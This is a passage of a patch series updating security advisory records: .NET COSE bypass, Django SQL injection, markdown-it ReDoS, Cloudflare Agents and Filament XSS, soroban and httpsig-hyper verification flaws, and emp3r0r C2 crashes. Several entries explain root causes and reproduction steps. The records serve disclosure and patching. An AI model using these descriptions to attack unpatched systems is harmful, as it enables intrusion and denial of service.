.NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 9.0.0, < 9.0.12 | 9.0.13\n\n### .NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 8.0.0, < 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\nTo update the Using the System.Security.Cryptography.Cose NuGet package, use one of the following methods:\n\nNuGet Package Manager UI in Visual Studio:\n- Open your project in Visual Studio.\n- Right-click on your project in Solution Explorer and select \"Manage NuGet Packages...\" or navigate to \"Project > Manage NuGet Packages\".\n- In the NuGet Package Manager window, select the \"Updates\" tab. This tab lists packages with available updates from your configured package sources.\n- Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.\n- Click the \"Update\" button.\n\nUsing the NuGet Package Manager Console in Visual Studio:\n- Open your project in Visual Studio.\n- Navigate to \"Tools > NuGet Package Manager > Package Manager Console\".\n- To update a specific package to its latest version, use the following Update-Package command:\n\n```\nUpdate-Package -Id System.Security.Cryptography.Cose\n```\n\nUsing the .NET CLI (Command Line Interface):\n- Open a terminal or command prompt in your project's directory.\n- To update a specific package to its latest version, use the following add package command:\n\n```\ndotnet add package System.Security.Cryptography.Cose\n```\n\nOnce you have updated the nuget package reference you must recompile and deploy your application. Additionally we recommend you update your runtime and/or SDKs, but it is not necessary to patch the vulnerability.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).\n\nSecurity reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2026-21218](https://www.cve.org/CVERecord?id=CVE-2026-21218)\n\n### Acknowledgements\n\nvcsjones with GitHub\n\n### Revisions\n\nV1.0 (February 10, 2026): Advisory published.", + "details": "# Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0, .NET 9.0, and .NET 10.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn attacker could exploit this vulnerability by crafting a malicious payload that bypasses the security checks in the affected System.Security.Cryptography.Cose versions, potentially leading to unauthorized access or data manipulation.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/380\n\n## Mitigation factors\n\nIf your application does not use System.Security.Cryptography.Cose it is not affected. By default, no .NET applications reference this component.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET project if it uses any of affected packages versions listed below\n\n### .NET 10\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 10.0.0, <= 10.0.2 | 10.0.3\n\n### .NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 9.0.0, <= 9.0.12 | 9.0.13\n\n### .NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 8.0.0, <= 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\nTo update the Using the System.Security.Cryptography.Cose NuGet package, use one of the following methods:\n\nNuGet Package Manager UI in Visual Studio:\n- Open your project in Visual Studio.\n- Right-click on your project in Solution Explorer and select \"Manage NuGet Packages...\" or navigate to \"Project > Manage NuGet Packages\".\n- In the NuGet Package Manager window, select the \"Updates\" tab. This tab lists packages with available updates from your configured package sources.\n- Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.\n- Click the \"Update\" button.\n\nUsing the NuGet Package Manager Console in Visual Studio:\n- Open your project in Visual Studio.\n- Navigate to \"Tools > NuGet Package Manager > Package Manager Console\".\n- To update a specific package to its latest version, use the following Update-Package command:\n\n```\nUpdate-Package -Id System.Security.Cryptography.Cose\n```\n\nUsing the .NET CLI (Command Line Interface):\n- Open a terminal or command prompt in your project's directory.\n- To update a specific package to its latest version, use the following add package command:\n\n```\ndotnet add package System.Security.Cryptography.Cose\n```\n\nOnce you have updated the nuget package reference you must recompile and deploy your application. Additionally we recommend you update your runtime and/or SDKs, but it is not necessary to patch the vulnerability.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).\n\nSecurity reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2026-21218](https://www.cve.org/CVERecord?id=CVE-2026-21218)\n\n### Acknowledgements\n\nvcsjones with GitHub\n\n### Revisions\n\nV1.0 (February 10, 2026): Advisory published.", "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" - }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" @@ -60,7 +56,7 @@ } ], "database_specific": { - "last_known_affected_version_range": "< 9.0.12" + "last_known_affected_version_range": "<= 9.0.12" } }, { @@ -82,7 +78,7 @@ } ], "database_specific": { - "last_known_affected_version_range": "< 10.0.2" + "last_known_affected_version_range": "<= 10.0.2" } } ], From b0da1d5857c7eaaccab279ecc444471f0098ad3b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 19:57:35 +0000 Subject: [PATCH 068/215] Publish GHSA-6426-9fv3-65x8 --- .../2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json b/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json index a760766599ba5..4ca15dfff45b2 100644 --- a/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json +++ b/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6426-9fv3-65x8", - "modified": "2026-02-03T19:35:57Z", + "modified": "2026-02-13T19:55:25Z", "published": "2026-02-03T15:30:24Z", "aliases": [ "CVE-2026-1312" @@ -10,8 +10,8 @@ "details": "An issue was discovered in 6.0 before 6.0.2, 5.2 before 5.2.11, and 4.2 before 4.2.28.\n\n`.QuerySet.order_by()` is subject to SQL injection in column aliases containing periods when the same alias is, using a suitably crafted dictionary, with dictionary expansion, used in `FilteredRelation`. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\n\nDjango would like to thank Solomon Kebede for reporting this issue.", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ], "affected": [ @@ -107,7 +107,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": "HIGH", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-03T19:35:56Z", "nvd_published_at": "2026-02-03T15:16:13Z" From acfcbcdafb291203572a85474681a243af8bfe36 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 20:06:46 +0000 Subject: [PATCH 069/215] Publish Advisories GHSA-38c4-r59v-3vqw GHSA-cvhv-6xm6-c3v4 GHSA-g433-pq76-6cmf GHSA-cvhv-6xm6-c3v4 --- .../GHSA-38c4-r59v-3vqw.json | 37 ++++++- .../GHSA-cvhv-6xm6-c3v4.json | 65 +++++++++++ .../GHSA-g433-pq76-6cmf.json | 103 ++++++++++++++++++ .../GHSA-cvhv-6xm6-c3v4.json | 34 ------ 4 files changed, 199 insertions(+), 40 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json (67%) create mode 100644 advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-g433-pq76-6cmf/GHSA-g433-pq76-6cmf.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json diff --git a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json similarity index 67% rename from advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json rename to advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json index 89a716520ae70..8d068ccd0ebf8 100644 --- a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json +++ b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-38c4-r59v-3vqw", - "modified": "2026-02-12T06:30:13Z", + "modified": "2026-02-13T20:04:39Z", "published": "2026-02-12T06:30:13Z", "aliases": [ "CVE-2026-2327" ], + "summary": "markdown-it is has a Regular Expression Denial of Service (ReDoS)", "details": "Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.", "severity": [ { @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "markdown-it" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "13.0.0" + }, + { + "fixed": "14.1.1" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +52,13 @@ "type": "WEB", "url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917" }, + { + "type": "PACKAGE", + "url": "https://github.com/markdown-it/markdown-it" + }, { "type": "WEB", - "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs%23L33" + "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs#L33" }, { "type": "WEB", @@ -45,8 +70,8 @@ "CWE-1333" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-13T20:04:39Z", "nvd_published_at": "2026-02-12T06:16:02Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json b/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json new file mode 100644 index 0000000000000..3cc25c3b3a55b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvhv-6xm6-c3v4", + "modified": "2026-02-13T20:04:56Z", + "published": "2026-02-13T03:31:23Z", + "aliases": [ + "CVE-2026-1721" + ], + "summary": "Cloudflare Agents is Vulnerable to Reflected Cross-Site Scripting in the AI Playground's OAuth callback handler", + "details": "Summary\n\nA Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the AI Playground's OAuth callback handler. The `error_description` query parameter was directly interpolated into an HTML script tag without proper escaping, allowing attackers to execute arbitrary JavaScript in the context of the victim's session.\n\nRoot cause\n\nThe OAuth callback handler in `site/ai-playground/src/server.ts` directly interpolated the `authError` value, sourced from the `error_description` query parameter, into an inline ` $state,\n])>\n```\n\nSince Laravel does not escape special characters within the `@style` Blade directive, the effective output HTML would be:\n\n```html\n
\n```\n\nCreating the opportunity for arbitrary JS to run if it was stored in the database.\n\n### Response\n\nThis vulnerability (in `ColorColumn` only) was reported by @sv-LayZ, who reported the issue and patched the issue during the evening of 25/09/2024. Thank you Mattis.\n\nThe review process concluded on 27/09/2024, which revealed the issue was also present in `ColorEntry`. This was fixed the same day and Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115) followed to escape any special characters while outputting inline styles like this:\n\n```blade\n
$state,\n])>
\n```\n\nAlthough these components are no longer vulnerable to this type of XSS attack, it is good practice to validate colors, and since many Filament users may be accepting color input using the `ColorPicker` form component, [additional color validation documentation was published](https://filamentphp.com/docs/3.x/forms/fields/color-picker#color-picker-validation).", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [ { "package": { @@ -71,7 +76,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": "CRITICAL", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-09-27T20:51:01Z", "nvd_published_at": "2024-09-27T21:15:03Z" From f835ce7b9f868951c89aab8c4b6f063e1d723451 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 17 Feb 2026 21:30:30 +0000 Subject: [PATCH 130/215] Publish Advisories GHSA-4chv-4c6w-w254 GHSA-7v42-g35v-xrch GHSA-f5p9-j34q-pwcc --- .../GHSA-4chv-4c6w-w254.json | 120 ++++++++++++++++++ .../GHSA-7v42-g35v-xrch.json | 74 +++++++++++ .../GHSA-f5p9-j34q-pwcc.json | 66 ++++++++++ 3 files changed, 260 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-f5p9-j34q-pwcc/GHSA-f5p9-j34q-pwcc.json diff --git a/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json new file mode 100644 index 0000000000000..9ce39d9038fa0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json @@ -0,0 +1,120 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4chv-4c6w-w254", + "modified": "2026-02-17T21:29:05Z", + "published": "2026-02-17T21:29:05Z", + "aliases": [ + "CVE-2026-26267" + ], + "summary": "The rs-soroban-sdk #[contractimpl] macro calls inherent function instead of trait function when names collide", + "details": "### Impact\n\nThe `#[contractimpl]` macro contains a bug in how it wires up function calls.\n\nIn Rust, you can define functions on a type in two ways:\n- Directly on the type as an inherent function:\n ```rust\n impl MyContract {\n fn value() { ... }\n }\n ```\n- Through a trait\n ```rust\n impl Trait for MyContract {\n fn value() { ... }\n }\n ```\n\nThese are two separate functions that happen to share the same name. Rust has rules for which one gets called. When you write `MyContract::value()`, Rust always picks the one defined directly on the type, not the trait version.\n\nThe bug is that `#[contractimpl]` generates code that uses `MyContract::value()` style calls even when it's processing the trait version. This means if an inherent function is also defined with the same name, the inherent function gets called instead of the trait function.\n\nThis means the Wasm-exported entry point silently calls the wrong function when two conditions are met simultaneously:\n1. A `impl Trait for MyContract` block is defined with one or more functions, with `#[contractimpl]` applied.\n2. A `impl MyContract` block is defined with one or more identically named functions, without `#[contractimpl]` applied.\n\nIf the trait version contains important security checks, such as verifying the caller is authorized, that the inherent version does not, those checks are bypassed. Anyone interacting with the contract through its public interface will call the wrong function.\n\nFor example:\n\n```rust\n#[contract]\npub struct Contract;\n\nimpl Contract {\n /// Inherent function — returns 1.\n /// Bug: The macro-generated WASM export is wired up to call this function.\n pub fn value() -> u32 {\n 1\n }\n}\n\npub trait Trait {\n fn value(env: Env) -> u32;\n}\n\n#[contractimpl]\nimpl Trait for MyContract {\n /// Trait implementation — returns 2.\n /// Fix: The macro-generated WASM export should call this function.\n fn value() -> u32 {\n 2\n }\n}\n```\n\n### Patches\n\nThe problem is patched in `soroban-sdk-macros` version **25.1.1**. The fix changes the generated call from `::func()` to `::func()` when processing trait implementations, ensuring Rust resolves to the trait associated function regardless of whether an inherent function with the same name exists.\n\nUsers should upgrade to `soroban-sdk-macros` **>= 25.1.1** and recompile their contracts.\n\n### Workarounds\n\nIf upgrading is not immediately possible, contract developers can avoid the issue by ensuring that no inherent associated function on the contract type shares a name with any function in the trait implementation. Renaming or removing the conflicting inherent function eliminates the ambiguity and causes the macro-generated code to correctly resolve to the trait function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "soroban-sdk-macros" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "25.0.0" + }, + { + "fixed": "25.1.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 25.1.0" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "soroban-sdk-macros" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "23.0.0" + }, + { + "fixed": "23.5.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 23.5.1" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "soroban-sdk-macros" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "22.0.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 22.0.9" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/security/advisories/GHSA-4chv-4c6w-w254" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/pull/1729" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/pull/1730" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/pull/1731" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/commit/e92a3933e5f92dc09da3c740cf6a360d55709a2b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stellar/rs-soroban-sdk" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-670" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:29:05Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json b/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json new file mode 100644 index 0000000000000..8366aba3562b7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json @@ -0,0 +1,74 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7v42-g35v-xrch", + "modified": "2026-02-17T21:29:34Z", + "published": "2026-02-17T21:29:34Z", + "aliases": [ + "CVE-2026-26275" + ], + "summary": "Improper Digest Verification in httpsig-hyper May Allow Message Integrity Bypass", + "details": "### Impact\n\nAn issue was discovered in `httpsig-hyper` where Digest header verification could incorrectly succeed due to misuse of Rust's `matches!` macro. Specifically, the comparison:\n\n```rust\nif matches!(digest, _expected_digest)\n```\n\ntreated `_expected_digest` as a pattern binding rather than a value comparison, resulting in unconditional success of the match expression.\n\nAs a consequence, digest verification could incorrectly return success even when the computed digest did not match the expected value.\n\nApplications relying on Digest verification as part of HTTP message signature validation may therefore fail to detect message body modification. The severity depends on how the library is integrated and whether additional signature validation layers are enforced.\n\n---\n\n### Patches\n\nThis issue has been fixed in:\n\n- `httpsig-hyper` >= 0.0.23\n\nThe fix replaces the incorrect `matches!` usage with proper value comparison and additionally introduces constant-time comparison for digest verification as defense-in-depth.\n\nRegression tests have also been added to prevent reintroduction of this issue. Users are strongly advised to upgrade to the patched version.\n\n---\n\n### Workarounds\n\nThere is no reliable workaround without upgrading. Users who cannot immediately upgrade should avoid relying solely on Digest verification for message integrity and ensure that full HTTP message signature verification is enforced at the application layer.\n\n---\n\n### References\n\n- PR: https://github.com/junkurihara/httpsig-rs/pull/14\n- Follow-up hardening and test additions: https://github.com/junkurihara/httpsig-rs/pull/15", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "httpsig-hyper" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/junkurihara/httpsig-rs/security/advisories/GHSA-7v42-g35v-xrch" + }, + { + "type": "WEB", + "url": "https://github.com/junkurihara/httpsig-rs/pull/14" + }, + { + "type": "WEB", + "url": "https://github.com/junkurihara/httpsig-rs/pull/15" + }, + { + "type": "WEB", + "url": "https://github.com/junkurihara/httpsig-rs/commit/5533f596c650377e02f4aa9e3eb8dba591b87370" + }, + { + "type": "WEB", + "url": "https://github.com/junkurihara/httpsig-rs/commit/65cbd19b395180a4bba09a89746c4b14ccb8d297" + }, + { + "type": "PACKAGE", + "url": "https://github.com/junkurihara/httpsig-rs" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-354", + "CWE-697" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:29:34Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-f5p9-j34q-pwcc/GHSA-f5p9-j34q-pwcc.json b/advisories/github-reviewed/2026/02/GHSA-f5p9-j34q-pwcc/GHSA-f5p9-j34q-pwcc.json new file mode 100644 index 0000000000000..e3c4ac2e025e5 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-f5p9-j34q-pwcc/GHSA-f5p9-j34q-pwcc.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f5p9-j34q-pwcc", + "modified": "2026-02-17T21:27:58Z", + "published": "2026-02-17T21:27:58Z", + "aliases": [ + "CVE-2026-26201" + ], + "summary": "emp3r0r Affected by Concurrent Map Access DoS (panic/crash)", + "details": "## Summary\n\nMultiple shared maps are accessed without consistent synchronization across goroutines. Under concurrent activity, Go runtime can trigger `fatal error: concurrent map read and map write`, causing C2 process crash (availability loss).\n\n## Vulnerable Component(with code examples)\n\nOperator relay map had mixed access patterns (iteration and mutation without a single lock policy):\n\n```go\n// vulnerable pattern (operator session map)\nfor sessionID, op := range OPERATORS { // iteration path\n ...\n}\n\n// concurrent mutation path elsewhere\nOPERATORS[operatorSession] = &operator_t{...}\ndelete(OPERATORS, operatorSession)\n```\n\nPort-forwarding session map had read/write paths guarded inconsistently:\n\n```go\n// vulnerable pattern (port forward map)\nif sess, ok := PortFwds[id]; ok { // read path\n ...\n}\n\nPortFwds[id] = newSession // write path\ndelete(PortFwds, id) // delete path\n```\n\nFTP stream map similarly mixed concurrent iteration with mutation:\n\n```go\n// vulnerable pattern (FTP stream map)\nfor token, stream := range FTPStreams { // iteration path\n ...\n}\n\nFTPStreams[token] = stream // write path\ndelete(FTPStreams, token) // delete path\n```\n\n## Attack Vector\n\n1. Attacker (or stress traffic in authenticated flows) triggers high concurrency in normal control paths.\n2. Operator sessions connect/disconnect while message forwarding and file-transfer workflows are active.\n3. Concurrent read/write hits shared maps.\n4. Go runtime panics with concurrent map read/write error.\n5. C2 component exits, producing denial of service.\n\n## Proof of Concept\n\n1. Start C2 server with active operator session(s) in a lab environment.\n2. Generate rapid operator session churn (connect/disconnect loops).\n3. Simultaneously drive agent message tunnel traffic and/or file transfer activity.\n4. Observe crash signature in logs: `fatal error: concurrent map read and map write`.\n5. Optional: run with race detector in dev build to confirm race locations.\n\n## Impact\n\n- C2 service interruption due to process panic/crash.\n- Operational instability under load or deliberate churn.\n- Repeated crash-restart cycles can degrade command reliability and incident response workflows.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/jm33-m0/emp3r0r/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.0-20260212232424-ea4d074f081d" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/jm33-m0/emp3r0r/security/advisories/GHSA-f5p9-j34q-pwcc" + }, + { + "type": "WEB", + "url": "https://github.com/jm33-m0/emp3r0r/commit/ea4d074f081dac6293f3aec38f01def5f08d5af5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jm33-m0/emp3r0r" + }, + { + "type": "WEB", + "url": "https://github.com/jm33-m0/emp3r0r/releases/tag/v3.21.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362", + "CWE-663" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:27:58Z", + "nvd_published_at": null + } +} \ No newline at end of file From 42ec163609d18b8008567c964959d19792f6903a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 17 Feb 2026 21:34:21 +0000 Subject: [PATCH 131/215] Advisory Database Sync --- .../GHSA-3m3q-x3gj-f79x.json | 82 +++++++++++++++++++ .../GHSA-g27f-9qjv-22pm.json | 67 +++++++++++++++ .../GHSA-jmr7-xgp7-cmfj.json | 65 +++++++++++++++ .../GHSA-mv9j-6xhh-g383.json | 64 +++++++++++++++ .../GHSA-wfp2-v9c7-fh79.json | 67 +++++++++++++++ .../GHSA-h58h-8g45-v677.json | 16 +++- .../GHSA-qfxw-56c6-7pjg.json | 17 +++- .../GHSA-9c5h-6x6r-hvxh.json | 4 +- .../GHSA-gvpq-95j2-mc36.json | 4 +- .../GHSA-22f5-q5gp-64wx.json | 6 +- .../GHSA-q28j-qr7m-gpf6.json | 6 +- 